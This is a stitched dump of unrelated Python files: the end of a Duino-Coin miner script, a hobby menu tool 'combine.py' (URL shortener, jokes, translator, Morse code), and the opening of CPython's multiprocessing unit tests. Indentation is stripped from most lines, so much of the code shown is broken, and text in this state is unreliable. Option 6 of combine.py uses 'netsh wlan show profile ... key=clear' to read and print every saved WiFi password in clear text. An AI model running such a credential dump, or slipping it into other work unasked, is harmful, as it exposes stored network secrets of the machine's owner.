total_hashrate = get_prefix("H/s", sum(hashrate.values()), 2)
RPC.update(details="Hashrate: " + str(total_hashrate),
start=mining_start_time,
state=str(accept.value) + "/"
+ str(reject.value + accept.value)
+ " accepted shares",
large_image="ducol",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything"
+ ", including AVR boards",
buttons=[{"label": "Visit duinocoin.com",
"url": "https://duinocoin.com"},
{"label": "Join the Discord",
"url": "https://discord.gg/k48Ht5y"}])
except Exception as e:
#print("Error updating Discord RPC thread: " + str(e))
pass
sleep(15)
Miner.preload()
p_list = []
mining_start_time = time()
if __name__ == "__main__":
from multiprocessing import freeze_support
freeze_support()
cpu = cpuinfo.get_cpu_info()
accept = Manager().Value("i", 0)
reject = Manager().Value("i", 0)
hashrate = Manager().dict()
signal(SIGINT, handler)
user_settings = Miner.load_cfg()
Miner.greeting()
fastest_pool = Client.fetch_pool()
Donate.load(int(user_settings["donate"]))
Donate.start(int(user_settings["donate"]))
"""
Generate a random number that's used only to
make the wallets display one miner with many threads
instead of many separate miners clogging it up
(like it was before release 2.7.3)
"""
single_miner_id = randint(0, 2811)
threads = int(user_settings["threads"])
if threads > 8:
threads = 8
pretty_print(Style.BRIGHT
+ get_string("max_threads_notice"))
for i in range(threads):
p = Process(target=Miner.mine,
args=[i, user_settings,
fastest_pool, accept, reject,
hashrate, single_miner_id])
p_list.append(p)
p.start()
sleep(0.05)
Discord_rp.connect()
for p in p_list:
p.join()
|
combine.py
|
import pyshorteners,pyjokes,pyttsx3,os,threading,socket,subprocess,pygame,time,sys
from googletrans import *
from gtts import gTTS
from covid import Covid
from threading import Thread
from playsound import playsound
def playAudiobackground ():
playsound('s1.mp3')
def main():
while True:
print("\n\t\t\t\t*****WELCOME*******")
        print("\t\t\t| Press 1 For URL Shortener")
        print("\t\t\t| Press 2 For Jokes Generator")
        print("\t\t\t| Press 3 For Translator English to Other Languages")
        print("\t\t\t| Press 4 to Get Updated Covid Information For India")
        print("\t\t\t| Press 5 to Get Computer Name and Its IP Address")
        print("\t\t\t| Press 6 to Get WiFi Passwords")
        print("\t\t\t| Press 7 to Encrypt Message Into Morse Code")
        print("\t\t\t| Press 8 to Exit")
print()
try:
choice=int(input())
if(choice==1):
                url = input("Enter your URL: ")
                s = pyshorteners.Shortener().tinyurl.short(url)
                print("Your shortened URL is -->", s)
pass
elif choice==2:
joke=pyjokes.get_joke()
print(joke)
engine=pyttsx3.init()
""" RATE"""
rate = engine.getProperty('rate') # getting details of current speaking rate
engine.setProperty('rate', 200) # setting up new voice rate
"""VOLUME"""
volume = engine.getProperty('volume') #getting to know current volume level (min=0 and max=1)
engine.setProperty('volume',1.0) # setting up volume level between 0 and 1
"""VOICE"""
voices = engine.getProperty('voices') #getting details of current voice
#engine.setProperty('voice', voices[0].id) #changing index, changes voices. o for male
engine.setProperty('voice', voices[0].id) #changing index, changes voices. 1 for female
print("Narrating the joke ")
engine.say(joke)
engine.runAndWait()
pass
elif choice==3:
#text = '''The computer was born to solve problems that did not exist before'''
                print("Languages : ")
print(''''af'--'Afrikaans', 'sq'--'Albanian','ar'--'Arabic','hy'--'Armenian',
'bn'--'Bengali','ca'--'Catalan','zh'--'Chinese','zh-cn'--'Chinese (Mandarin/China)',
'zh-tw'--'Chinese (Mandarin/Taiwan)','zh-yue'--'Chinese (Cantonese)','hr'--'Croatian',
'cs'--'Czech','da'--'Danish','nl'--'Dutch','en'--'English','en-au'--'English (Australia)',
'en-uk'--'English (United Kingdom)','en-us'--'English (United States)','fi'--'Finnish',
'fr'--'French','de'--'German','el'--'Greek','hi'--'Hindi','hu'--'Hungarian','is'--'Icelandic',
'id'--'Indonesian','it'--'Italian','ja'--'Japanese','ko'--'Korean','la'--'Latin','lv'--'Latvian',
'mk'--'Macedonian','no'--'Norwegian','pl'--'Polish','pt'--'Portuguese',
'pt-br'--'Portuguese (Brazil)','ro'--'Romanian','ru'--'Russian','sr'--'Serbian',
'sk'--'Slovak','es'--'Spanish','es-es'--'Spanish (Spain)','es-us'--'Spanish (United States)',
'sw'--'Swahili','sv'--'Swedish','ta'--'Tamil','th'--'Thai',
'tr'--'Turkish','vi'--'Vietnamese','cy'--'Welsh''')
                lang=input("Enter the language you want to convert into ")
text=input("Enter Word/phrase")
translator = Translator()
temp= translator.detect(text)
print('-----------------------------------------------------------------------')
print('The Text is :')
print(text,"\n")
                translated = translator.translate(text,dest=lang)  # dest sets the target language (see the list above)
# 'af':'Afrikaans', 'sq':'Albanian','ar':'Arabic','hy':'Armenian','bn':'Bengali','ca':'Catalan','zh':'Chinese','zh-cn':'Chinese (Mandarin/China)',
# 'zh-tw':'Chinese (Mandarin/Taiwan)','zh-yue':'Chinese (Cantonese)','hr':'Croatian','cs':'Czech','da':'Danish','nl':'Dutch','en':'English','en-au':'English (Australia)',
# 'en-uk':'English (United Kingdom)','en-us':'English (United States)','fi':'Finnish','fr':'French','de':'German','el':'Greek','hi':'Hindi','hu':'Hungarian','is':'Icelandic',
# 'id':'Indonesian','it':'Italian','ja':'Japanese','ko':'Korean','la':'Latin','lv':'Latvian','mk':'Macedonian','no':'Norwegian','pl':'Polish','pt':'Portuguese',
# 'pt-br':'Portuguese (Brazil)','ro':'Romanian','ru':'Russian','sr':'Serbian','sk':'Slovak','es':'Spanish','es-es':'Spanish (Spain)','es-us':'Spanish (United States)',
# 'sw':'Swahili','sv':'Swedish','ta':'Tamil','th':'Thai','tr':'Turkish','vi':'Vietnamese','cy':'Welsh'
                print("SOURCE Language : ",translated.src)
                print("DESTINATION Language : ",translated.dest,"\n")
print("Translated :")
print(translated.text)
print("please wait...processing")
TTS = gTTS(text=translated.text, lang='en-in') #lang changes the accent
#Accents -
#en-au (Australia)
# en-gb (United Kingdom)
# en-in (India)
# en-us (United States)
# Save to mp3 in current dir.
TTS.save("voice.mp3")
# Plays the mp3 using the default app on your system
# that is linked to mp3s.
os.system("start voice.mp3")
pass
elif choice == 4:
# initializing
covid = Covid()
# printing data for the world
print("Total active cases in world:", covid.get_total_active_cases())
print("Total recovered cases in world:", covid.get_total_recovered())
print("Total deaths in world:", covid.get_total_deaths())
# getting data according to country name
# data will be stored as a dictionary
cases = covid.get_status_by_country_name("INDIA")
# printing country's data using for loop
for x in cases:
print(x, ":", cases[x])
pass
elif choice==5:
# getting machine name
hostname = socket.gethostname()
# getting IP Address
IPAddr = socket.gethostbyname(hostname)
# printing hostname
print("Your Computer Name is:" + hostname)
# printing IP Address
print("Your Computer IP Address is:" + IPAddr)
pass
elif choice==6:
# now we will store the profiles data in "data" variable by
# running the 1st cmd command using subprocess.check_output
data = subprocess.check_output(['netsh', 'wlan', 'show', 'profiles']).decode('utf-8').split('\n')
# now we will store the profile by converting them to list
profiles = [i.split(":")[1][1:-1] for i in data if "All User Profile" in i]
# using for loop in python we are checking and printing the wifi
# passwords if they are available using the 2nd cmd command
for i in profiles:
# running the 2nd cmd command to check passwords
results = subprocess.check_output(['netsh', 'wlan', 'show', 'profile', i,
'key=clear']).decode('utf-8').split('\n')
# storing passwords after converting them to list
results = [b.split(":")[1][1:-1] for b in results if "Key Content" in b]
# printing the profiles(wifi name) with their passwords using
# try and except method
try:
print ("{:<30}| {:<}".format(i, results[0]))
except IndexError:
print ("{:<30}| {:<}".format(i, ""))
pass
elif choice==7:
#These are the dots and dashes or dits and dahs correspond to the alphabet
CODE = {'A': '.-', 'B': '-...', 'C': '-.-.',
'D': '-..', 'E': '.', 'F': '..-.',
'G': '--.', 'H': '....', 'I': '..',
'J': '.---', 'K': '-.-', 'L': '.-..',
'M': '--', 'N': '-.', 'O': '---',
'P': '.--.', 'Q': '--.-', 'R': '.-.',
'S': '...', 'T': '-', 'U': '..-',
'V': '...-', 'W': '.--', 'X': '-..-',
'Y': '-.--', 'Z': '--..',
'0': '-----', '1': '.----', '2': '..---',
'3': '...--', '4': '....-', '5': '.....',
'6': '-....', '7': '--...', '8': '---..',
'9': '----.'
}
ONE_UNIT = 0.5
THREE_UNITS = 3 * ONE_UNIT
SEVEN_UNITS = 7 * ONE_UNIT
PATH = 'morse_sound_files/' #The path of the audio file
#The method Verifies that there shouldn't be any special characters
def verify(string):
keys = CODE.keys()
for char in string:
if char.upper() not in keys and char != ' ':
                            sys.exit('Error: the character ' + char + ' cannot be translated to Morse Code')
def main():
print('Welcome to Alphabet to Morse Code Translator v.01\n')
msg = input('Enter Message: ')
verify(msg)
print
pygame.init()
fi=[]
for char in msg:
if char == ' ':
print (' '*7,
time.sleep(SEVEN_UNITS))
else:
print (CODE[char.upper()],
pygame.mixer.music.load(PATH + char.upper() + '_morse_code.ogg'))
pygame.mixer.music.play()
time.sleep(THREE_UNITS)
temp=CODE[char.upper()],pygame.mixer.music.load(PATH + char.upper() + '_morse_code.ogg')
fi.append(temp)
                    actualCode,noneList=zip(*fi)  # unzip the list into two lists to get the final Morse Code at the end
                    print("Your Morse Code:",''.join(actualCode))
print ('\n\nGoodbye!')
if __name__ == "__main__":
main()
pass
elif choice ==8:
quit()
else:
print("\ninvalid ! Try again")
except Exception as e:
print(e)
print("invalid details ! Try again")
#Threading
t1=Thread(target=playAudiobackground)
t1.start()
t2=Thread(target=main)
t2.start()
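# A text-only sketch of the Morse translation behind option 7, without the
# pygame audio files, so the mapping can be tried on its own (letters are
# separated by spaces and words by "/", unlike the concatenated output above):
def morse_text_only(msg):
    code = {'A': '.-', 'B': '-...', 'C': '-.-.', 'D': '-..', 'E': '.',
            'F': '..-.', 'G': '--.', 'H': '....', 'I': '..', 'J': '.---',
            'K': '-.-', 'L': '.-..', 'M': '--', 'N': '-.', 'O': '---',
            'P': '.--.', 'Q': '--.-', 'R': '.-.', 'S': '...', 'T': '-',
            'U': '..-', 'V': '...-', 'W': '.--', 'X': '-..-', 'Y': '-.--',
            'Z': '--..', '0': '-----', '1': '.----', '2': '..---',
            '3': '...--', '4': '....-', '5': '.....', '6': '-....',
            '7': '--...', '8': '---..', '9': '----.'}
    return ' '.join('/' if ch == ' ' else code.get(ch.upper(), '?') for ch in msg)
# Example: morse_text_only("SOS 1") returns "... --- ... / .----"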
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import subprocess
import struct
import operator
import pickle
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
from multiprocessing import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
try:
import msvcrt
except ImportError:
msvcrt = None
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
    # Since multiprocessing.Process has the same API as threading.Thread
    # (join() and is_alive()), the support function can be reused
support.join_thread(process)
if os.name == "posix":
from multiprocessing import resource_tracker
def _resource_unlink(name, rtype):
resource_tracker._CLEANUP_FUNCS[rtype](name)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
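# Minimal usage of the wrapper above: time a call without changing its result.
# (Illustrative only; the test cases below construct their own wrappers.)
def _timing_wrapper_demo():
    wrapped_sleep = TimingWrapper(time.sleep)
    wrapped_sleep(0.05)
    return wrapped_sleep.elapsed   # roughly 0.05 seconds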
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
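# Illustration of the helper above with a raw multiprocessing semaphore; on
# platforms with a broken sem_getvalue this raises NotImplementedError, which
# is why the tests go through assertReturnsIfImplemented().
def _get_value_demo():
    sem = multiprocessing.Semaphore(2)
    return get_value(sem)   # 2 where the platform supports sem_getvalue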
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_parent_process_attributes(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
self.assertIsNone(self.parent_process())
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(target=self._test_send_parent_process, args=(wconn,))
p.start()
p.join()
parent_pid, parent_name = rconn.recv()
self.assertEqual(parent_pid, self.current_process().pid)
self.assertEqual(parent_pid, os.getpid())
self.assertEqual(parent_name, self.current_process().name)
@classmethod
def _test_send_parent_process(cls, wconn):
from multiprocessing.process import parent_process
wconn.send([parent_process().pid, parent_process().name])
def test_parent_process(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# Launch a child process. Make it launch a grandchild process. Kill the
# child process and make sure that the grandchild notices the death of
# its parent (a.k.a the child process).
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(
target=self._test_create_grandchild_process, args=(wconn, ))
p.start()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "alive")
p.terminate()
p.join()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "not alive")
@classmethod
def _test_create_grandchild_process(cls, wconn):
p = cls.Process(target=cls._test_report_parent_status, args=(wconn, ))
p.start()
time.sleep(300)
@classmethod
def _test_report_parent_status(cls, wconn):
from multiprocessing.process import parent_process
wconn.send("alive" if parent_process().is_alive() else "not alive")
parent_process().join(timeout=support.SHORT_TIMEOUT)
wconn.send("alive" if parent_process().is_alive() else "not alive")
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@unittest.skipUnless(threading._HAVE_THREAD_NATIVE_ID, "needs native_id")
def test_process_mainthread_native_id(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current_mainthread_native_id = threading.main_thread().native_id
q = self.Queue(1)
p = self.Process(target=self._test_process_mainthread_native_id, args=(q,))
p.start()
child_mainthread_native_id = q.get()
p.join()
close_queue(q)
self.assertNotEqual(current_mainthread_native_id, child_mainthread_native_id)
@classmethod
def _test_process_mainthread_native_id(cls, q):
mainthread_native_id = threading.main_thread().native_id
q.put(mainthread_native_id)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
cases = [
((True,), 1),
((False,), 0),
((8,), 8),
((None,), 0),
((), 0),
]
for args, expected in cases:
with self.subTest(args=args):
p = self.Process(target=sys.exit, args=args)
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, expected)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
